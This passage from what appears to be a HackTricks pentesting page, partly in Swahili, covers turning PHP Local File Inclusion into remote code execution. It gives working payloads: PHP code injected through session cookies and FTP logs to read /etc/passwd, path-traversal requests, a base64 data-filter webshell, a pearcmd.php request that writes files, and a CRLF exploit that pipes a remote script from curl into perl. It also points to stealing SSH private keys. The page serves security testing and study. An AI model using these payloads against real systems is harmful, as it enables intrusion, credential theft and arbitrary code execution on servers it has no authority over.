Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
Katika PHP sessions hizi zinahifadhiwa katika _/var/lib/php5/sess\\_\[PHPSESSID]\_ mafaili
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
Weka cookie kuwa `<?php system('cat /etc/passwd');?>`
```
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```
Tumia LFI kujumuisha faili ya session ya PHP
```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
```
### Kupitia ssh

Ikiwa ssh inafanya kazi, angalia ni mtumiaji gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**

### **Kupitia** **vsftpd** _**logs**_

The logs for the FTP server vsftpd are located at _**/var/log/vsftpd.log**_. Katika tukio ambapo kuna udhaifu wa Local File Inclusion (LFI), na uwezekano wa kufikia server ya vsftpd iliyo wazi, hatua zifuatazo zinaweza kuzingatiwa:

1. Ingiza PHP payload kwenye username field wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata logs za server kutoka _**/var/log/vsftpd.log**_.

### Kupitia php base64 filter (using base64)

Kama ilivyoonyeshwa katika [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter just ignore Non-base64. Unaweza kutumia hilo kupita ukaguzi wa file extension: ikiwa utatoa base64 inayomalizika na ".php", itapuuza tu "." na kuongeza "php" kwenye base64. Hapa kuna mfano wa payload:
```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
### Kupitia php filters (hakuna faili inahitajika)

This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.


{{#ref}}
lfi2rce-via-php-filters.md
{{#endref}}

### Kupitia segmentation fault

**Upload** a file that will be stored as **temporary** in `/tmp`, then in the **same request,** trigger a **segmentation fault**, and then the **temporary file won't be deleted** and you can search for it.


{{#ref}}
lfi2rce-via-segmentation-fault.md
{{#endref}}

### Kupitia Nginx temp file storage

If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique:


{{#ref}}
lfi2rce-via-nginx-temp-files.md
{{#endref}}

### Kupitia PHP_SESSION_UPLOAD_PROGRESS

If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**. You could abuse this to get RCE:


{{#ref}}
via-php_session_upload_progress.md
{{#endref}}

### Kupitia temp file uploads in Windows

If you found a **Local File Inclusion** and and the server is running in **Windows** you might get RCE:


{{#ref}}
lfi2rce-via-temp-file-uploads.md
{{#endref}}

### Kupitia `pearcmd.php` + URL args

As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument. See also [watchTowr’s write-up](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/) and [Orange Tsai’s “Confusion Attacks”](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/).

The following request create a file in `/tmp/hello.php` with the content `<?=phpinfo()?>`:
```bash
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
```
Ifuatayo inatumia vuln ya CRLF kupata RCE (kutoka [**here**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)):
```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
```
### Kupitia phpinfo() (file_uploads = on)

Ikiwa umepata **Local File Inclusion** na faili inayoonyesha **phpinfo()** ambapo file_uploads = on unaweza kupata RCE:


{{#ref}}
lfi2rce-via-phpinfo.md
{{#endref}}

### Kupitia compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure

Ikiwa umepata **Local File Inclusion** na unaweza **exfiltrate the path** ya temp file LAKINI **server** inakagua kama **file to be included has PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia **Race Condition**:


{{#ref}}
lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
{{#endref}}

### Kupitia eternal waiting + bruteforce

Ikiwa unaweza kutumia LFI ku**upload temporary files** na kufanya **server** iangushe utekelezaji wa PHP, basi unaweza kisha **brute force filenames during hours** ili kupata temporary file:


{{#ref}}
lfi2rce-via-eternal-waiting.md
{{#endref}}

### Kwa Fatal Error

Ikiwa ujumuisha yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha hitilafu hiyo).

**Sijui jinsi hii inavyoweza kuwa muhimu lakini inaweza kuwa.**\
_Hata ukisababisha PHP Fatal Error, PHP temporary files zilizopakiwa zinafutwa._

<figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>

## References

- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
- [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
- [watchTowr – We need to talk about PHP (pearcmd.php gadget)](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/)
- [Orange Tsai – Confusion Attacks on Apache](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/)
- [VTENEXT 25.02 – a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)

{{#file}}
EN-Local-File-Inclusion-1.pdf
{{#endfile}}

{{#include ../../banners/hacktricks-training.md}}